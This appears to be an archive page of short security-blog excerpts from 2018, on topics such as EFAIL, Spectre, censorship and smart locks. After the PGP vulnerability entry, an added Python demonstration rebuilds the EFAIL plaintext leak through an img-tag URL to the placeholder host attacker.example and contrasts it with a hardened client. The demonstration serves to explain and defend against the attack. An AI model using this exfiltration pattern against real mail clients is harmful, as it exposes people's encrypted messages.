California Passes New Privacy Law
The California legislature unanimously passed the strongest data privacy law in the nation. This is great news, but I have a lot of reservations. The Internet tech companies pressed to get this law passed out of self-defense. A ballot initiative was already going to be voted on in November, one...
Traffic Analysis of the LTE Mobile Standard
Interesting research in using traffic analysis to learn things about encrypted traffic. It's hard to know how critical these vulnerabilities are. They're very hard to close without wasting a huge amount of bandwidth. The active attacks are more interesting. EDITED TO ADD 7/3: More information. I...
Friday Squid Blogging: Fried Squid with Turmeric
Good-looking recipe. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
Conservation of Threat
Here's some interesting research about how we perceive threats. Basically, as the environment becomes safer we manufacture new threats. From an essay about the research: To study how concepts change when they become less common, we brought volunteers into our laboratory and gave them a...
Manipulative Social Media Practices
The Norwegian Consumer Council just published an excellent report on the deceptive practices tech companies use to trick people into giving up their privacy. From the executive summary: Facebook and Google have privacy intrusive defaults, where users who want the privacy friendly option have to g...
IEEE Statement on Strong Encryption vs. Backdoors
The IEEE came out in favor of strong encryption: IEEE supports the use of unfettered strong encryption to protect confidentiality and integrity of data and communications. We oppose efforts by governments to restrict the use of strong encryption and/or to mandate exceptional access mechanisms suc...
Bypassing Passcodes in iOS
Last week, a story was going around explaining how to brute-force an iOS password. Basically, the trick was to plug the phone into an external keyboard and try every PIN at once: We reported Friday on Hickey's findings, which claimed to be able to send all combinations of a user's possible...
Secure Speculative Execution
We're starting to see research into designing speculative execution systems that avoid Spectre- and Meltdown-like security problems. Here's one. I don't know if this particular design is secure. My guess is that we're going to see several iterations of design and attack before we settle on something...
Friday Squid Blogging: Capturing the Giant Squid on Video
In this 2013 TED talk, oceanographer Edith Widder explains how her team captured the giant squid on video. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
The Effects of Iran's Telegram Ban
The Center for Human Rights in Iran has released a report outlining the effects of that country's ban on Telegram, a secure messaging app used by about half of the country. The ban will disrupt the most important, uncensored platform for information and communication in Iran, one that is used...
Domain Name Stealing at Gunpoint
I missed this story when it came around last year: someone tried to steal a domain name at gunpoint. He was just sentenced to 20 years in jail...
Algeria Shut Down the Internet to Prevent Students from Cheating on Exams
Algeria shut the Internet down nationwide to prevent high-school students from cheating on their exams. The solution in New South Wales, Australia was to ban smartphones. EDITED TO ADD 6/22: Slashdot thread...
Perverse Vulnerability from Interaction between 2-Factor Authentication and iOS AutoFill
Apple is rolling out an iOS security usability feature called Security code AutoFill. The basic idea is that the OS scans incoming SMS messages for security codes and suggests them in AutoFill, so that people can use them without having to memorize or type them. Sounds like a really good idea, bu...
Are Free Societies at a Disadvantage in National Cybersecurity
Jack Goldsmith and Stuart Russell just published an interesting paper, making the case that free and democratic nations are at a structural disadvantage in nation-on-nation cyberattack and defense. From a blog post: It seeks to explain why the United States is struggling to deal with the "soft"...
Ridiculously Insecure Smart Lock
Tapplock sells an "unbreakable" Internet-connected lock that you can open with your fingerprint. It turns out that: 1. The lock broadcasts its Bluetooth MAC address in the clear, and you can calculate the unlock key from it. 2. Any Tapplock account can unlock every lock. 3. You can open the lock...
Friday Squid Blogging: Cephalopod Week on Science Friday
It's Cephalopod Week! "Three hearts, eight arms, can't lose." As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
Thomas Dullien on Complexity and Security
For many years, I have said that complexity is the worst enemy of security. At CyCon earlier this month, Thomas Dullien gave an excellent talk on the subject with far more detail than I've ever provided. Video. Slides...
Russian Censorship of Telegram
Internet censors have a new strategy in their bid to block applications and websites: pressuring the large cloud providers that host them. These providers have concerns that are much broader than the targets of censorship efforts, so they have the choice of either standing up to the censors or...
New iPhone OS May Include Device-Unlocking Security
iOS 12, the next release of Apple's iPhone operating system, may include features to prevent someone from unlocking your phone without your permission: The feature essentially forces users to unlock the iPhone with the passcode when connecting it to a USB accessory every time the phone has not bee...
Router Vulnerability and the VPNFilter Botnet
On May 25, the FBI asked us all to reboot our routers. The story behind this request is one of sophisticated malware and unsophisticated home-network security, and it's a harbinger of the sorts of pervasive threats from nation-states, criminals and hackers that we should expect in coming year...
Friday Squid Blogging: Extinct Relatives of Squid
Interesting fossils. Note that a poster is available. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
New Data Privacy Regulations
When Mark Zuckerberg testified before both the House and the Senate last month, it became immediately obvious that few US lawmakers had any appetite to regulate the pervasive surveillance taking place on the Internet. Right now, the only way we can force these companies to take our privacy more...
An Example of Deterrence in Cyberspace
In 2016, the US was successfully deterred from attacking Russia in cyberspace because of fears of Russian capabilities against the US. I have two citations for this. The first is from the book Russian Roulette: The Inside Story of Putin's War on America and the Election of Donald Trump, by Michae...
The Habituation of Security Warnings
We all know that it happens: when we see a security warning too often -- and without effect -- we start tuning it out. A new paper uses fMRI, eye tracking, and field studies to prove it. EDITED TO ADD 6/6: This blog post summarizes the findings...
Regulating Bitcoin
Ross Anderson has a new paper on cryptocurrency exchanges. From his blog: Bitcoin Redux explains what's going wrong in the world of cryptocurrencies. The bitcoin exchanges are developing into a shadow banking system, which do not give their customers actual bitcoin but rather display a "balance"...
E-Mail Vulnerabilities and Disclosure
Last week, researchers disclosed vulnerabilities in a large number of encrypted e-mail clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and AppleMail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client...
Friday Squid Blogging: Do Cephalopods Contain Alien DNA?
Maybe not DNA, but biological somethings. "Cause of Cambrian explosion -- Terrestrial or Cosmic?": Abstract: We review the salient evidence consistent with or predicted by the Hoyle-Wickramasinghe H-W thesis of Cometary Cosmic Biology. Much of this physical and biological evidence is...
Damaging Hard Drives with an Ultrasonic Attack
Playing a sound over the speakers can cause computers to crash and possibly even physically damage the hard drive. Academic paper...
1834: The First Cyberattack
Tom Standage has a great story of the first cyberattack against a telegraph network. The Blanc brothers traded government bonds at the exchange in the city of Bordeaux, where information about market movements took several days to arrive from Paris by mail coach. Accordingly, traders who could ge...
Numbers Stations
On numbers stations...
Kidnapping Fraud
Fake kidnapping fraud: "Most commonly we have unsolicited calls to potential victims in Australia, purporting to represent the people in authority in China and suggesting to intending victims here they have been involved in some sort of offence in China or elsewhere, for which they're being held...
Friday Squid Blogging: Squid Comic
It's not very good, but it has a squid in it. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
Security and Human Behavior (SHB 2018)
I'm at Carnegie Mellon University, at the eleventh Workshop on Security and Human Behavior. SHB is a small invitational gathering of people studying various aspects of the human side of security, organized each year by Alessandro Acquisti, Ross Anderson, and myself. The 50 or so people in the roo...
Detecting Lies through Mouse Movements
Interesting research: "The detection of faked identity using unexpected questions and mouse dynamics," by Merylin Monaro, Luciano Gamberini, and Giuseppe Sartori. Abstract: The detection of faked identities is a major problem in security. Current memory-detection techniques cannot be used as they...
Font Steganography
Interesting research in steganography at the font level...
Supermarket Shoplifting
The rise of self-checkout has caused a corresponding rise in shoplifting...
Another Spectre-Like CPU Vulnerability
Google and Microsoft researchers have disclosed another Spectre-like CPU side-channel vulnerability, called "Speculative Store Bypass." Like the others, the fix will slow the CPU down. The German tech site Heise reports that more are coming. I'm not surprised. Writing about Spectre and Meltdown i...
Japan's Directorate for Signals Intelligence
The Intercept has a long article on Japan's equivalent of the NSA: the Directorate for Signals Intelligence. Interesting, but nothing really surprising. The directorate has a history that dates back to the 1950s; its role is to eavesdrop on communications. But its operations remain so highly...
Friday Squid Blogging: Flying Squid
Flying squid are real. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
Maliciously Changing Someone's Address
Someone changed the address of UPS corporate headquarters to his own apartment in Chicago. The company discovered it three months later. The problem, of course, is that in the US there isn't any authentication of change-of-address submissions: According to the Postal Service, nearly 37 million...
White House Eliminates Cybersecurity Position
The White House has eliminated the cybersecurity coordinator position. This seems like a spectacularly bad idea...
Accessing Cell Phone Location Information
The New York Times is reporting about a company called Securus Technologies that gives police the ability to track cell phone locations without a warrant: The service can find the whereabouts of almost any cellphone in the country within seconds. It does this by going through a system typically...
Sending Inaudible Commands to Voice Assistants
Researchers have demonstrated the ability to send inaudible commands to voice assistants like Alexa, Siri, and Google Assistant. Over the last two years, researchers in China and the United States have begun demonstrating that they can send hidden commands that are undetectable to the human ear t...
Details on a New PGP Vulnerability
A new PGP vulnerability was announced today. Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. Essentially, if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote...
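To make the mechanism in that excerpt concrete, here is an added example (not code from the original post or from the researchers) of how an HTML-rendering mail client leaks plaintext when an attacker who cannot read the ciphertext wraps it in an unclosed img tag. The "decryption" step, the attacker host attacker.example and the message text are all constructed stand-ins; the point is the contrast between a client that concatenates decrypted parts into one document and one that parses each MIME part in isolation with remote loads off.

```python
from html.parser import HTMLParser

# Constructed example: SECRET_PLAINTEXT stands in for the body an OpenPGP/S-MIME
# decryption step would produce. The attacker never sees it, but can wrap the
# ciphertext in attacker-controlled HTML parts while the message is in transit.
SECRET_PLAINTEXT = "Meeting moved to 4pm, use the side entrance."


def attacker_wraps(encrypted_part):
    """Prepend and append HTML so that, once decrypted and concatenated, the
    plaintext lands inside the src attribute of an <img> pointing at the
    attacker's host (attacker.example is an assumed hostname)."""
    return ['<img src="http://attacker.example/collect?d=', encrypted_part, '">']


def decrypt(part):
    """Stand-in for real decryption: in this example ciphertext is ENC(...)."""
    if part.startswith("ENC(") and part.endswith(")"):
        return part[4:-1]
    return part


class RemoteLoadCollector(HTMLParser):
    """Records every URL a rendering engine would fetch for <img src=...>."""

    def __init__(self):
        super().__init__()
        self.requests = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.requests.append(value)


def naive_client(parts):
    """Vulnerable behaviour: decrypt every part, join them into one HTML
    document and render with remote loading on. The attacker's open tag
    swallows the decrypted text and the plaintext goes out in the URL."""
    html = "".join(decrypt(p) for p in parts)
    collector = RemoteLoadCollector()
    collector.feed(html)
    return collector.requests


def hardened_client(parts, allow_remote=False):
    """Each MIME part is parsed as its own document, so a tag opened in one
    part cannot absorb text from another; remote loads are off by default.
    The attacker's fragment is an incomplete tag and is never emitted."""
    requests = []
    for p in parts:
        collector = RemoteLoadCollector()
        collector.feed(decrypt(p))  # no close(): a dangling tag stays buffered
        if allow_remote:
            requests.extend(collector.requests)
    return requests


def leaked_plaintext(requests):
    """URLs from a render pass that carry the secret out of the client."""
    return [u for u in requests if SECRET_PLAINTEXT in u]


if __name__ == "__main__":
    wrapped = attacker_wraps("ENC(" + SECRET_PLAINTEXT + ")")
    print("naive client fetches:", leaked_plaintext(naive_client(wrapped)))
    print("hardened client fetches:", hardened_client(wrapped, allow_remote=True))
```

The hardened version addresses the page's point directly: the leak needs the client to both stitch attacker-controlled HTML around decrypted content and then fetch remote resources, so breaking either link (per-part rendering, or no remote loads without explicit consent) closes this particular channel.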
Critical PGP Vulnerability
EFF is reporting that a critical vulnerability has been discovered in PGP and S/MIME. No details have been published yet, but one of the researchers wrote: We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of...
Friday Squid Blogging: How the Squid Lost Its Shell
Squids used to have shells. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...
Airline Ticket Fraud
New research: "Leaving on a jet plane: the trade in fraudulently obtained airline tickets:" Abstract: Every day, hundreds of people fly on airline tickets that have been obtained fraudulently. This crime script analysis provides an overview of the trade in these tickets, drawing on interviews wit...
Supply-Chain Security
Earlier this month, the Pentagon stopped selling phones made by the Chinese companies ZTE and Huawei on military bases because they might be used to spy on their users. It's a legitimate fear, and perhaps a prudent action. But it's just one instance of the much larger issue of securing our supply...
Virginia Beach Police Want Encrypted Radios
This article says that the Virginia Beach police are looking to buy encrypted radios. Virginia Beach police believe encryption will prevent criminals from listening to police communications. They said officer safety would increase and citizens would be better protected. Someone should ask them if...
The US Is Unprepared for Election-Related Hacking in 2018
This survey and report is not surprising: The survey of nearly forty Republican and Democratic campaign operatives, administered through November and December 2017, revealed that American political campaign staff -- primarily working at the state and congressional levels -- are not only unprepare...